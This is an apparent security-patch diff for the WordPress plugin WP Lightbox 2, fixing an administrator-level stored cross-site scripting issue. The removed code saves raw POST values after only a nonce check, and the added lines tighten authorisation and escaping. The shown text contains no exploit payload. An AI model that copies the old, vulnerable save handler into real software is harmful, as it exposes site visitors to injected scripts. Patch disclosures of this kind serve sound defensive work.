CVE-2026-1430: WP Lightbox 2 < 3.0.7 – Authenticated (Administrator+) Stored Cross-Site Scripting (wp-lightbox-2)

--- a/wp-lightbox-2/admin/admin_menu.php
+++ b/wp-lightbox-2/admin/admin_menu.php
@@ -1,73 +1,97 @@
-<?php
-require_once($this->plugin_path.'admin/general_settings.php');
+<?php

-class wp_lightbox_admin_menu{
-
-	private $menu_name;
-
+require_once $this->plugin_path . 'admin/general_settings.php';
+
+class wp_lightbox_admin_menu {
+
+	private $menu_name;
 	private $databese_parametrs;
-
 	private $plugin_url;
-
 	private $plugin_path;
-
-	private $text_parametrs;

-	public  $wp_lightbox_2_general_settings_page;
-
-	function __construct($param){
-		$this->menu_name='WP Lightbox 2';
-		$this->databese_parametrs=$param['databese_parametrs']->get_general_settings;
-
-		$this->wp_lightbox_2_general_settings_page  =new wp_lightbox_2_general_settings_page( array( 'plugin_url'=> $this->plugin_url, 'plugin_path' => $this->plugin_path,'databese_settings' =>$this->databese_parametrs));
-
-		// set plugin url
-		if(isset($param['plugin_url']))
-			$this->plugin_url=$param['plugin_url'];
-		else
-			$this->plugin_url=trailingslashit(dirname(plugins_url('',__FILE__)));
-		// set plugin path
-		if(isset($param['plugin_path']))
-			$this->plugin_path=$param['plugin_path'];
-		else
-			$this->plugin_path=trailingslashit(dirname(plugin_dir_path(__FILE__)));
+	public $wp_lightbox_2_general_settings_page;
+
+	public function __construct( $param = array() ) {
+		$this->menu_name		  = 'WP Lightbox 2';
+		$this->databese_parametrs = $param[ 'databese_parametrs' ]->get_general_settings;
+
+		$this->wp_lightbox_2_general_settings_page = new wp_lightbox_2_general_settings_page( array(
+			'plugin_url'        => $this->plugin_url,
+			'plugin_path'       => $this->plugin_path,
+			'databese_settings' => $this->databese_parametrs
+		) );

-
+		// set plugin url
+		if ( isset( $param[ 'plugin_url' ] ) ) {
+			$this->plugin_url = $param[ 'plugin_url' ];
+		} else {
+			$this->plugin_url = trailingslashit( dirname( plugins_url( '', __FILE__ ) ) );
+		}

+		// set plugin path
+		if ( isset( $param[ 'plugin_path' ] ) ) {
+			$this->plugin_path = $param[ 'plugin_path' ];
+		} else {
+			$this->plugin_path = trailingslashit( dirname( plugin_dir_path( __FILE__ ) ) );
+		}
 	}

-
-	/// function for registr new button
-	function poll_button_register($plugin_array)
-	{
-		$url = $this->plugin_url.'admin/scripts/editor_plugin.js';
-		$plugin_array["poll_mce"] = $url;
+	public function poll_button_register( $plugin_array = array() ) {
+		$url                        = $this->plugin_url . 'admin/scripts/editor_plugin.js';
+		$plugin_array[ "poll_mce" ] = $url;
+
 		return $plugin_array;
-
 	}

+	public function create_menu() {

-	public function window_for_inserting_contentt(){}
-	public function create_menu(){
-
-		$manage_page_main = add_menu_page( $this->menu_name, $this->menu_name, 'manage_options', str_replace( ' ', '-', $this->menu_name), array($this->wp_lightbox_2_general_settings_page, 'controller_page'),$this->plugin_url.'admin/images/icon_lightboxx2.png');
-							add_submenu_page( str_replace( ' ', '-', $this->menu_name), 'General settings', 'General settings', 'manage_options', str_replace( ' ', '-', $this->menu_name), array($this->wp_lightbox_2_general_settings_page, 'controller_page'));
-		add_action('admin_print_styles-' .$manage_page_main, array($this,'menu_requeried_scripts'));
+		$manage_page_main = add_menu_page(
+			$this->menu_name,
+			$this->menu_name,
+			'manage_options',
+			str_replace( ' ', '-', $this->menu_name ),
+			array(
+				$this->wp_lightbox_2_general_settings_page,
+				'controller_page'
+			),
+			$this->plugin_url . 'admin/images/icon_lightboxx2.png'
+		);
+
+		add_submenu_page(
+			str_replace( ' ', '-', $this->menu_name ),
+			'General settings',
+			'General settings',
+			'manage_options',
+			str_replace( ' ', '-', $this->menu_name ),
+			array(
+				$this->wp_lightbox_2_general_settings_page,
+				'controller_page'
+			)
+		);
+
+		add_action(
+			'admin_print_styles-' . $manage_page_main,
+			array(
+				$this,
+				'menu_requeried_scripts'
+			)
+		);
 	}
-	public function menu_requeried_scripts(){
-		wp_enqueue_script('jquery-ui-style');
-		wp_enqueue_script('jquery');
-		wp_enqueue_script('jquery-ui-core');
-		wp_enqueue_script("jquery-ui-widget");
-		wp_enqueue_script("jquery-ui-mouse");
-		wp_enqueue_script("jquery-ui-slider");
-		wp_enqueue_script("jquery-ui-sortable");
-		wp_enqueue_script('wp-color-picker');
-		wp_enqueue_style("jquery-ui-style");
-		wp_enqueue_style("admin_style_wp_lightbox");
+
+	public function menu_requeried_scripts() {
+		wp_enqueue_script( 'jquery-ui-style' );
+		wp_enqueue_script( 'jquery' );
+		wp_enqueue_script( 'jquery-ui-core' );
+		wp_enqueue_script( 'jquery-ui-widget' );
+		wp_enqueue_script( 'jquery-ui-mouse' );
+		wp_enqueue_script( 'jquery-ui-slider' );
+		wp_enqueue_script( 'jquery-ui-sortable' );
+		wp_enqueue_script( 'wp-color-picker' );
+
+		wp_enqueue_style( 'jquery-ui-style' );
+		wp_enqueue_style( 'admin_style_wp_lightbox' );
 		wp_enqueue_style( 'wp-color-picker' );
+
 		add_thickbox();
-
 	}
-
-}
 No newline at end of file
+}
--- a/wp-lightbox-2/admin/general_settings.php
+++ b/wp-lightbox-2/admin/general_settings.php
@@ -1,245 +1,266 @@
 <?php
 class wp_lightbox_2_general_settings_page{
-	private $menu_name;
+
 	private $databese_settings;
 	public  $initial_values;

 	protected $plugin_url = '';
 	protected $plugin_path = '';

-	function __construct($params){
+	public function __construct( $params = array() ) {
+
 		// set plugin url
-		if(isset($params['plugin_url']))
-			$this->plugin_url=$params['plugin_url'];
-		else
-			$this->plugin_url=trailingslashit(dirname(plugins_url('',__FILE__)));
+		if ( isset( $params['plugin_url'] ) ) {
+			$this->plugin_url = $params['plugin_url'];
+		} else {
+			$this->plugin_url = trailingslashit(dirname(plugins_url('',__FILE__)));
+		}
+
 		// set plugin path
-		if(isset($params['plugin_path']))
-			$this->plugin_path=$params['plugin_path'];
-		else
-			$this->plugin_path=trailingslashit(dirname(plugin_dir_path('',__FILE__)));
+		if ( isset( $params['plugin_path'] ) ) {
+			$this->plugin_path = $params['plugin_path'];
+		} else {
+			$this->plugin_path = trailingslashit(dirname(plugin_dir_path('',__FILE__)));
+		}

-		$this->databese_settings=$params['databese_settings'];
+		$this->databese_settings = $params['databese_settings'];

 		/*ajax parametrs*/
-		add_action( 'wp_ajax_save_in_databese_lightbox2', array($this,'save_parametrs') );
-
+		add_action( 'wp_ajax_save_in_databese_lightbox2', array( $this,'save_parametrs' ) );
 	}
-	public function save_parametrs(){
-		 $initial_values= $this->databese_settings;
-	$kk=1;
-		if(isset($_POST['wp_lightbox_2_general_settings_page']) && wp_verify_nonce( $_POST['wp_lightbox_2_general_settings_page'],'wp_lightbox_2_general_settings_page')){
-
-			foreach($initial_values as $key => $value){
-				if(isset($_POST[$key])){
-					update_option($key,stripslashes($_POST[$key]));
-				}
-				else{
-					$kk=0;
-					printf('error saving %s <br>',$key);
+
+	public function save_parametrs() {
+		$initial_values = $this->databese_settings;
+		$kk = 1;
+
+		if ( ! current_user_can( 'manage_options' ) || ! wp_doing_ajax() ) {
+			die('Authorization Problem');
+		}
+
+		if ( isset( $_POST['wp_lightbox_2_general_settings_page'] ) && wp_verify_nonce( $_POST['wp_lightbox_2_general_settings_page'], 'wp_lightbox_2_general_settings_page' ) ) {
+
+			foreach ( $initial_values as $key => $value ) {
+				if ( isset( $_POST[ $key ] ) ) {
+					update_option( $key, stripslashes( $_POST[ $key ] ) );
+				} else {
+					$kk = 0;
+
+					printf( 'error saving %s <br>', $key );
 				}
 			}
+		} else {
+			die('Authorization Problem');
 		}
-		else{
-			die('Authorization Problem ');
-		}
-		if($kk==0){
+
+		if ( empty( $kk ) ) {
 			exit;
 		}
+
 		die('sax_normala');
 	}
-	/*#################### CONTROLERRR ########################*/
-	/*#################### CONTROLERRR ########################*/
-	/*#################### CONTROLERRR ########################*/
-	public function controller_page(){

-			$this->display_table_list_answers();
+	public function controller_page() {
+		$this->display_table_list_answers();
 	}

+	private function display_table_list_answers() {

-	private function display_table_list_answers(){
+		$initial_values = $this->databese_settings;

-    $initial_values= $this->databese_settings;
-    foreach($initial_values as $key => $value){
-			$$key=esc_attr($value);
-	}
-	?>
+		// Allow
+		extract( $initial_values );

-        <style>
-		.popup_settings{
-			<?php echo $youtube_plus_show_popup?'':'display:none;'; ?>
-		}
-        </style>
-        <h2>Lightbox General Settings</h2>
-        <div class="main_yutube_plus_params">
-        <table class="wp-list-table widefat fixed posts wp_lightbox2_settings_table" style="width: 900px; min-width:320px !important;table-layout: fixed;">
-            <thead>
-                <tr>
-                    <th width="50%">
-                   		<span> Lightbox General Settings </span>
-                    </th>
-                    <th width="50%">
-                    	 
-                   	</th>
-                </tr>
-            </thead>
-            <tbody>
-                <tr class="parametr_chechbox">
-                    <td>
-                   		Use Lightbox for all image links: <span title="Enable or disable the lightbox." class="desription_class">?</span>
-                    </td>
-                    <td>
-                    	<input type="checkbox" name="jqlb_automate_checkbox" id="jqlb_automate_checkbox" <?php checked($jqlb_automate,'1'); ?> value="1">
-                    	<input type="hidden" name="jqlb_automate" id="jqlb_automate" value="<?php echo $jqlb_automate; ?>">
-                    </td>
-                </tr>
-                <tr class="parametr_chechbox">
-                    <td>
-                   		Enable lightbox in comments: <span title="This feature will enable lightbox for your comments. " class="desription_class">?</span>
-                    </td>
-                    <td>
-                    	<input type="checkbox" name="jqlb_comments_checkbox" id="jqlb_comments_checkbox" <?php checked($jqlb_comments,'1'); ?> value="1">
-                    	<input type="hidden" name="jqlb_comments" id="jqlb_comments" value="<?php echo $jqlb_comments; ?>">
-                    </td>
-                </tr>
-                <tr class="parametr_chechbox">
-                    <td>
-                    	Show download link: <span title="You can display download link." class="desription_class">?</span>
-                    </td>
-                    <td>
-                    	<input type="checkbox" name="jqlb_show_download_checkbox" id="jqlb_show_download_checkbox" <?php checked($jqlb_show_download,'1'); ?> value="1">
-                    	<input type="hidden" name="jqlb_show_download" id="jqlb_show_download" value="<?php echo $jqlb_show_download; ?>">
-                    </td>
-                </tr>
-                <tr>
-                    <td>
-                    	Overlay opacity: <span title="Set overlay opacity for lightbox." class="desription_class">?</span>
-                    </td>
-                    <td>
-						<input type="number" min="0" max="100" step="1" name="jqlb_overlay_opacity" id="jqlb_overlay_opacity" value="<?php echo $jqlb_overlay_opacity; ?>"><span class="befor_input_small_desc">%</span>
-                    </td>
-                </tr>
-                <tr class="parametr_chechbox">
-                    <td>
-                  	 	Show image info on top: <span title="Choose image info position." class="desription_class">?</span>
-                    </td>
-                    <td>
-                    	<input type="checkbox" name="jqlb_navbarOnTop_checkbox" id="jqlb_navbarOnTop_checkbox" <?php checked($jqlb_navbarOnTop,'1'); ?> value="1">
-                    	<input type="hidden" name="jqlb_navbarOnTop" id="jqlb_navbarOnTop" value="<?php echo $jqlb_navbarOnTop; ?>">
-                    </td>
-                </tr>
-                <tr class="parametr_chechbox">
-                    <td>
-                   		Reduce large images to fit smaller screens: <span title="We recommend to enable this option, it will reduce large images to fit smaller screens." class="desription_class">?</span>
-                    </td>
-                    <td>
-                    	<input type="checkbox" name="jqlb_resize_on_demand_checkbox" id="jqlb_resize_on_demand_checkbox" <?php checked($jqlb_resize_on_demand,'1'); ?> value="1">
-                    	<input type="hidden" name="jqlb_resize_on_demand" id="jqlb_resize_on_demand" value="<?php echo $jqlb_resize_on_demand; ?>">
-                    </td>
-                </tr>
-                <tr>
-                    <td>
-                    	Minimum margin from top:  <span title="You can change image position from top." class="desription_class">?</span>
-                    </td>
-                    <td>
-                    	<input type="number" min="0" max="999" step="1" name="jqlb_margin_size" id="jqlb_margin_size" value="<?php echo $jqlb_margin_size; ?>"><span class="befor_input_small_desc">(default: 0)</span>
-                    </td>
-                </tr>
-                <tr>
-                    <td>
-                   		Lightbox Animation duration: <span title="Type here animation duration for lightbox." class="desription_class">?</span>
-                    </td>
-                    <td>
-                    	<input type="number" min="0" max="9999999" step="1" name="jqlb_resize_speed" id="jqlb_resize_speed" value="<?php echo $jqlb_resize_speed; ?>"><span class="befor_input_small_desc">(milliseconds)</span>
-                    </td>
-                </tr>
-                <tr>
-                    <td>
-                    	Additional text below image info:  <span title="Type here text, and it will appear below images. " class="desription_class">?</span>
-                    </td>
-                    <td>
-                    	<input type="text" name="jqlb_help_text" id="jqlb_help_text" value="<?php echo $jqlb_help_text; ?>"><span class="befor_input_small_desc">(default: none)</span>
-                    </td>
-                </tr>
-            </tbody>
-            <tfoot>
-                <tr>
-                    <th colspan="2" width="100%"><button type="button" id="save_button_general" class="save_button button button-primary"><span class="save_button_span">Save Settings</span> <span class="saving_in_progress"> </span><span class="sucsses_save"> </span><span class="error_in_saving"> </span></button></th>
-                </tr>
-            </tfoot>
-		</table>
-		<ol>
-	<li>You can use WordPress image galleries and have them grouped and auto-lightboxed: <a href="http://codex.wordpress.org/Gallery_Shortcode"><code>[gallery link="file"]</code></a></li>
-	<li>You can also add a <code>rel="lightbox"</code> attribute to any link tag to activate the lightbox. For example:
-	<pre><code>	<a href="images/image-1.jpg" rel="lightbox" title="my caption">image #1</a></code></pre>
-	<em>Optional:</em> Use the <code>title</code> attribute if you want to show a caption.
-	</li>
-	<li>If you have a set of related images that you would like to group, simply include a group name in the rel attribute. For example:
-	<pre><code>	<a href="images/image-1.jpg" rel="lightbox[roadtrip]">image #1</a>
-	<a href="images/image-2.jpg" rel="lightbox[roadtrip]">image #2</a>
-	<a href="images/image-3.jpg" rel="lightbox[roadtrip]">image #3</a></code></pre>
-	No limits to the number of image sets per page or how many images are allowed in each set. Go nuts!</li>
-	<li>To <strong>disable</strong> lightboxing of an image link, just set any other rel-attribute: <code>rel="nobox"</code></li>
-	</ol>
-
-         <?php wp_nonce_field('wp_lightbox_2_general_settings_page','wp_lightbox_2_general_settings_page'); ?>
-	</div><br /><br /><span class="error_massage"></span>
-
-		<script>
+		// jQuery settings
+		$jquery_settings = '';
+		$keys            = array_keys( $initial_values );
+		foreach ( $keys as $key ) {
+			$jquery_settings .= $key . ':jQuery("#' . $key . '").val(),';
+		}

+		?>

+		<h2>Lightbox General Settings</h2>
+		<div class="main_yutube_plus_params">
+		<table class="wp-list-table widefat fixed posts wp_lightbox2_settings_table" style="width: 900px; min-width:320px !important;table-layout: fixed;">
+			<thead>
+				<tr>
+					<th width="50%">
+						<span> Lightbox General Settings </span>
+					</th>
+					<th width="50%">
+						 
+					</th>
+				</tr>
+			</thead>
+			<tbody>
+				<tr class="parametr_chechbox">
+					<td>
+						Use Lightbox for all image links: <span title="Enable or disable the lightbox." class="desription_class">?</span>
+					</td>
+					<td>
+						<input type="checkbox" name="jqlb_automate_checkbox" id="jqlb_automate_checkbox" <?php checked( $jqlb_automate, '1' ); ?> value="1">
+						<input type="hidden" name="jqlb_automate" id="jqlb_automate" value="<?php echo esc_attr( $jqlb_automate ); ?>">
+					</td>
+				</tr>
+				<tr class="parametr_chechbox">
+					<td>
+						Enable lightbox in comments: <span title="This feature will enable lightbox for your comments. " class="desription_class">?</span>
+					</td>
+					<td>
+						<input type="checkbox" name="jqlb_comments_checkbox" id="jqlb_comments_checkbox" <?php checked( $jqlb_comments, '1' ); ?> value="1">
+						<input type="hidden" name="jqlb_comments" id="jqlb_comments" value="<?php echo esc_attr( $jqlb_comments ); ?>">
+					</td>
+				</tr>
+				<tr class="parametr_chechbox">
+					<td>
+						Show download link: <span title="You can display download link." class="desription_class">?</span>
+					</td>
+					<td>
+						<input type="checkbox" name="jqlb_show_download_checkbox" id="jqlb_show_download_checkbox" <?php checked( $jqlb_show_download, '1' ); ?> value="1">
+						<input type="hidden" name="jqlb_show_download" id="jqlb_show_download" value="<?php echo esc_attr( $jqlb_show_download ); ?>">
+					</td>
+				</tr>
+				<tr>
+					<td>
+						Overlay opacity: <span title="Set overlay opacity for lightbox." class="desription_class">?</span>
+					</td>
+					<td>
+						<input type="number" min="0" max="100" step="1" name="jqlb_overlay_opacity" id="jqlb_overlay_opacity" value="<?php echo esc_attr( $jqlb_overlay_opacity ); ?>"><span class="befor_input_small_desc">%</span>
+					</td>
+				</tr>
+				<tr class="parametr_chechbox">
+					<td>
+						Show image info on top: <span title="Choose image info position." class="desription_class">?</span>
+					</td>
+					<td>
+						<input type="checkbox" name="jqlb_navbarOnTop_checkbox" id="jqlb_navbarOnTop_checkbox" <?php checked( $jqlb_navbarOnTop, '1' ); ?> value="1">
+						<input type="hidden" name="jqlb_navbarOnTop" id="jqlb_navbarOnTop" value="<?php echo esc_attr( $jqlb_navbarOnTop ); ?>">
+					</td>
+				</tr>
+				<tr class="parametr_chechbox">
+					<td>
+						Reduce large images to fit smaller screens: <span title="We recommend to enable this option, it will reduce large images to fit smaller screens." class="desription_class">?</span>
+					</td>
+					<td>
+						<input type="checkbox" name="jqlb_resize_on_demand_checkbox" id="jqlb_resize_on_demand_checkbox" <?php checked( $jqlb_resize_on_demand, '1' ); ?> value="1">
+						<input type="hidden" name="jqlb_resize_on_demand" id="jqlb_resize_on_demand" value="<?php echo esc_attr( $jqlb_resize_on_demand ); ?>">
+					</td>
+				</tr>
+				<tr>
+					<td>
+						Minimum margin from top: <span title="You can change image position from top." class="desription_class">?</span>
+					</td>
+					<td>
+						<input type="number" min="0" max="999" step="1" name="jqlb_margin_size" id="jqlb_margin_size" value="<?php echo esc_attr( $jqlb_margin_size ); ?>"><span class="befor_input_small_desc">(default: 0)</span>
+					</td>
+				</tr>
+				<tr>
+					<td>
+						Lightbox Animation duration: <span title="Animation duration for lightbox." class="desription_class">?</span>
+					</td>
+					<td>
+						<input type="number" min="0" max="9999999" step="1" name="jqlb_resize_speed" id="jqlb_resize_speed" value="<?php echo esc_attr( $jqlb_resize_speed ); ?>"><span class="befor_input_small_desc">(milliseconds)</span>
+					</td>
+				</tr>
+				<tr>
+					<td>
+						Additional text below image info: <span title="Text only (no HTML) that will appear below images. " class="desription_class">?</span>
+					</td>
+					<td>
+						<input type="text" name="jqlb_help_text" id="jqlb_help_text" value="<?php echo esc_attr( $jqlb_help_text ); ?>"><span class="befor_input_small_desc">(default: none)</span>
+					</td>
+				</tr>
+			</tbody>
+			<tfoot>
+				<tr>
+					<th colspan="2" width="100%">
+						<button type="button" id="save_button_general" class="save_button button button-primary">
+							<span class="save_button_span">Save Settings</span>
+							<span class="saving_in_progress"></span>
+							<span class="sucsses_save"></span>
+							<span class="error_in_saving"></span>
+						</button>
+					</th>
+				</tr>
+			</tfoot>
+		</table>

-		jQuery(document).ready(function(e) {
-
-			 jQuery('#save_button_general').click(function(){
-
-					jQuery('#save_button_general').addClass('padding_loading');
-					jQuery("#save_button_general").prop('disabled', true);
-					jQuery('.saving_in_progress').css('display','inline-block');
-					generete_checkbox('parametr_chechbox');
-
-					jQuery.ajax({
-						type:'POST',
-						url: "<?php echo admin_url( 'admin-ajax.php?action=save_in_databese_lightbox2' ); ?>",
-						data: {wp_lightbox_2_general_settings_page:jQuery('#wp_lightbox_2_general_settings_page').val()<?php foreach($initial_values as $key => $value){echo ','.$key.':jQuery("#'.$key.'").val()';} ?>},
-					}).done(function(date) {
-						if(date=='sax_normala'){
-							console.log
+		<ol>
+			<li>You can use WordPress image galleries and have them grouped and auto-lightboxed: <a href="https://codex.wordpress.org/Gallery_Shortcode"><code>[gallery link="file"]</code></a></li>
+			<li>You can also add a <code>rel="lightbox"</code> attribute to any link tag to activate the lightbox. For example:
+				<pre><a href="images/image-1.jpg" rel="lightbox" title="my caption">image #1</a></pre>
+				<em>Optional:</em> Use the <code>title</code> attribute if you want to show a caption.
+			</li>
+			<li>If you have a set of related images that you would like to group, simply include a group name in the rel attribute. For example:
+				<pre><a href="images/image-1.jpg" rel="lightbox[roadtrip]">image #1</a>
+<a href="images/image-2.jpg" rel="lightbox[roadtrip]">image #2</a>
+<a href="images/image-3.jpg" rel="lightbox[roadtrip]">image #3</a></pre>
+				No limits to the number of image sets per page or how many images are allowed in each set. Go nuts!
+			</li>
+			<li>To <strong>disable</strong> lightboxing of an image link, just set any other rel-attribute: <code>rel="nobox"</code></li>
+		</ol>
+
+		<?php wp_nonce_field( 'wp_lightbox_2_general_settings_page', 'wp_lightbox_2_general_settings_page' ); ?>
+	</div>
+
+	<br /><br /><span class="error_massage"></span>
+
+	<script>
+
+		jQuery(document).ready(function() {
+
+			jQuery('#save_button_general').click(function(){
+
+				jQuery('#save_button_general').addClass('padding_loading');
+				jQuery("#save_button_general").prop('disabled', true);
+				jQuery('.saving_in_progress').css('display','inline-block');
+
+				generete_checkbox('parametr_chechbox');
+
+				jQuery.ajax({
+					type:'POST',
+					url: "<?php echo admin_url( 'admin-ajax.php?action=save_in_databese_lightbox2' ); ?>",
+					data: {
+						wp_lightbox_2_general_settings_page:jQuery('#wp_lightbox_2_general_settings_page').val(),
+						<?php echo $jquery_settings; ?>
+					}
+				}).done(function(date) {
+					if(date==='sax_normala'){
 						jQuery('.saving_in_progress').css('display','none');
 						jQuery('.sucsses_save').css('display','inline-block');
-						setTimeout(function(){jQuery('.sucsses_save').css('display','none');jQuery('#save_button_general').removeClass('padding_loading');jQuery("#save_button_general").prop('disabled', false);},2500);
-						}else{
-							jQuery('.saving_in_progress').css('display','none');
-							jQuery('.error_in_saving').css('display','inline-block');
-							jQuery('.error_massage').css('display','inline-block');
-							jQuery('.error_massage').html(date);
-							setTimeout(function(){jQuery('#save_button_general').removeClass('padding_loading');jQuery("#save_button_general").prop('disabled', false);},5000);
-						}

-					});
+						setTimeout( function() {
+							jQuery('.sucsses_save').css('display','none');
+							jQuery('#save_button_general').removeClass('padding_loading');
+							jQuery("#save_button_general").prop('disabled', false);
+						},2500 );
+					}else{
+						jQuery('.saving_in_progress').css('display','none');
+						jQuery('.error_in_saving').css('display','inline-block');
+						jQuery('.error_massage').css('display','inline-block');
+						jQuery('.error_massage').html(date);
+
+						setTimeout( function() {
+							jQuery('#save_button_general').removeClass('padding_loading');
+							jQuery("#save_button_general").prop('disabled', false);
+						}, 5000 );
+					}
 				});
-				function generete_radio_input(radio_class){
-					jQuery('.'+radio_class).each(function(index, element) {
-                       jQuery(this).find('input[type=hidden]').val(jQuery(this).find('input[type=radio]:checked').val())
-                    });
-				}
-				function generete_checkbox(checkbox_class){
-					jQuery('.'+checkbox_class).each(function(index, element) {
-						if(jQuery(this).find('input[type=checkbox]').prop('checked'))
-                        	jQuery(this).find('input[type=hidden]').val(jQuery(this).find('input[type=checkbox]:checked').val());
-						else
-							jQuery(this).find('input[type=hidden]').val(0);
-                    });
-				}
+			});
+
+			function generete_checkbox(checkbox_class){
+				jQuery('.'+checkbox_class).each(function(index, element) {
+					if(jQuery(this).find('input[type=checkbox]').prop('checked'))
+						jQuery(this).find('input[type=hidden]').val(jQuery(this).find('input[type=checkbox]:checked').val());
+					else
+						jQuery(this).find('input[type=hidden]').val(0);
+				});
+			}

 		});

-        </script>
+	</script>

 		<?php
 	}
-
 }
-
-
- ?>
 No newline at end of file
--- a/wp-lightbox-2/includes/install_database.php
+++ b/wp-lightbox-2/includes/install_database.php
@@ -1,93 +1,90 @@
-<?php
+<?php

+class wp_lightbox2_database_params {

-
-class wp_lightbox2_database_params{
-
 	public $installed_options; // all standart_options
+	public $get_general_settings;
+	public $get_design_settings;
 	private $plugin_url;
-	public  $get_general_settings;
-	public  $get_design_settings;
-	function __construct(){
-
-		if(isset($params['plugin_url']))
-			$this->plugin_url=$params['plugin_url'];
-		else
-			$this->plugin_url=trailingslashit(dirname(plugins_url('',__FILE__)));
-		$general_settings=array(
-			'jqlb_overlay_opacity'=>'80',
-			'jqlb_help_text'=>'',
-			'jqlb_margin_size'=>0,
-			'jqlb_automate'=>1,
-			'jqlb_comments'=>1,
-			'jqlb_resize_on_demand'=>0,
-			'jqlb_show_download'=>0,
-			'jqlb_navbarOnTop'=>0,
-			'jqlb_resize_speed'=>400,
+
+	public function __construct( $params = array() ) {
+
+		if ( isset( $params[ 'plugin_url' ] ) ) {
+			$this->plugin_url = $params[ 'plugin_url' ];
+		} else {
+			$this->plugin_url = trailingslashit( dirname( plugins_url( '', __FILE__ ) ) );
+		}
+
+		$general_settings = array(
+			'jqlb_overlay_opacity'  => '80',
+			'jqlb_help_text'        => '',
+			'jqlb_margin_size'      => 0,
+			'jqlb_automate'         => 1,
+			'jqlb_comments'         => 1,
+			'jqlb_resize_on_demand' => 0,
+			'jqlb_show_download'    => 0,
+			'jqlb_navbarOnTop'      => 0,
+			'jqlb_resize_speed'     => 400,
 		);
-		foreach($general_settings as $key => $value){
-			if(!(get_option($key,12365498798465132148947984651)==12365498798465132148947984651)){
-				$general_settings[$key]=get_option($key);
+		foreach ( $general_settings as $key => $value ) {
+			if ( !(get_option( $key, 12365498798465132148947984651 ) == 12365498798465132148947984651) ) {
+				$general_settings[ $key ] = get_option( $key );
+			} else {
+				$general_settings[ $key ] = $value;
 			}
-			else{
-				$general_settings[$key]=$value;
-			}
-		}
-		 $this->get_general_settings=$general_settings;
-		 $locale = jqlb_get_locale();
-		 $folder='';
-		 switch($locale){
+		}
+		$this->get_general_settings = $general_settings;
+		$locale                     = jqlb_get_locale();
+		$folder                     = '';
+		switch ( $locale ) {
 			case 'cs_CZ':
-				$folder='cs_CZ/';
-			break;
+				$folder = 'cs_CZ/';
+				break;
 			case 'ru_RU':
-				$folder='ru_RU/';
-			break;
+				$folder = 'ru_RU/';
+				break;
 			case 'pl_PL':
-				$folder='pl_PL/';
-			break;
+				$folder = 'pl_PL/';
+				break;
 			case 'he_IL':
-				$folder='he_IL/';
-			break;
+				$folder = 'he_IL/';
+				break;
 		}

 		// Note: Deprecated 3.0.5+
-		$design_settings=array(
-			'jqlb_overlay_opacity'=>'80',
-			'jqlb_overlay_color'=>'#000000',
-			'jqlb_overlay_close'=>'1',
-			'jqlb_border_width'=>'10',
-			'jqlb_border_color'=>'#ffffff',
-			'jqlb_border_radius'=>'0',
-			'jqlb_image_info_background_transparency'=>'100',
-			'jqlb_image_info_bg_color'=>'#ffffff',
-			'jqlb_image_info_text_color'=>'#000000',
-			'jqlb_image_info_text_fontsize'=>'10',
-			'jqlb_show_text_for_image'=>'1',
-			'jqlb_next_image_title'=> __('next image', 'jqlb'),
-			'jqlb_previous_image_title'=>__('previous image', 'jqlb'),
-			'jqlb_next_button_image'=>$this->plugin_url.'styles/images/'.$folder.'next.gif',
-			'jqlb_previous_button_image'=>$this->plugin_url.'styles/images/'.$folder.'prev.gif',
-			'jqlb_maximum_width'=>'',
-			'jqlb_maximum_height'=>'',
-			'jqlb_show_close_button'=>'1',
-			'jqlb_close_image_title'=>__('close image gallery', 'jqlb'),
-			'jqlb_close_image_max_heght'=>'22',
-			'jqlb_image_for_close_lightbox'=>$this->plugin_url.'styles/images/'.$folder.'closelabel.gif',
-			'jqlb_keyboard_navigation'=>'1',
-			'jqlb_popup_size_fix'=>'0',
-		);
-		foreach($design_settings as $key => $value){
-			if(!(get_option($key,12365498798465132148947984651)==12365498798465132148947984651)){
-				$design_settings[$key]=get_option($key);
+		$design_settings = array(
+			'jqlb_overlay_opacity'                    => '80',
+			'jqlb_overlay_color'                      => '#000000',
+			'jqlb_overlay_close'                      => '1',
+			'jqlb_border_width'                       => '10',
+			'jqlb_border_color'                       => '#ffffff',
+			'jqlb_border_radius'                      => '0',
+			'jqlb_image_info_background_transparency' => '100',
+			'jqlb_image_info_bg_color'                => '#ffffff',
+			'jqlb_image_info_text_color'              => '#000000',
+			'jqlb_image_info_text_fontsize'           => '10',
+			'jqlb_show_text_for_image'                => '1',
+			'jqlb_next_image_title'                   => __( 'next image', 'jqlb' ),
+			'jqlb_previous_image_title'               => __( 'previous image', 'jqlb' ),
+			'jqlb_next_button_image'                  => $this->plugin_url . 'styles/images/' . $folder . 'next.gif',
+			'jqlb_previous_button_image'              => $this->plugin_url . 'styles/images/' . $folder . 'prev.gif',
+			'jqlb_maximum_width'                      => '',
+			'jqlb_maximum_height'                     => '',
+			'jqlb_show_close_button'                  => '1',
+			'jqlb_close_image_title'                  => __( 'close image gallery', 'jqlb' ),
+			'jqlb_close_image_max_heght'              => '22',
+			'jqlb_image_for_close_lightbox'           => $this->plugin_url . 'styles/images/' . $folder . 'closelabel.gif',
+			'jqlb_keyboard_navigation'                => '1',
+			'jqlb_popup_size_fix'                     => '0',
+		);
+
+		foreach ( $design_settings as $key => $value ) {
+			if ( !(get_option( $key, 12365498798465132148947984651 ) == 12365498798465132148947984651) ) {
+				$design_settings[ $key ] = get_option( $key );
+			} else {
+				$design_settings[ $key ] = $value;
 			}
-			else{
-				$design_settings[$key]=$value;
-			}
-		}
-		  $this->get_design_settings=$design_settings;
-
+		}
+		$this->get_design_settings = $design_settings;
 	}
-
-
-}
 No newline at end of file
+}
--- a/wp-lightbox-2/wp-lightbox-2.php
+++ b/wp-lightbox-2/wp-lightbox-2.php
@@ -1,15 +1,15 @@
 <?php
 /**
  * Plugin Name: WP Lightbox 2
- * Plugin URI:  http://wpdevart.com/wordpress-lightbox-plugin
+ * Plugin URI:  https://wpdevart.com/wordpress-lightbox-plugin
  * Description: WP Lightbox 2 adds stunning lightbox effects to images and galleries on your WordPress site.
- * Version:     3.0.6.8
+ * Version:     3.0.7
  * Author:      Syed Balkhi
- * Author URI:  http://syedbalkhi.com
+ * Author URI:  https://syedbalkhi.com
  * License:     GNU General Public License, v2 (or newer)
- * License URI: http://www.gnu.org/licenses/old-licenses/gpl-2.0.html
+ * License URI: https://www.gnu.org/licenses/old-licenses/gpl-2.0.html
  */
-/*  Copyright 2015 Syed Balkhi
+/*  Copyright 2015 Syed Balkhi

     This program is free software; you can redistribute it and/or modify
     it under the terms of the GNU General Public License as published by
@@ -26,152 +26,150 @@
 */

 add_action( 'plugins_loaded', 'jqlb_init' );
+
 function jqlb_init() {
-	if(!defined('ULFBEN_DONATE_URL')){
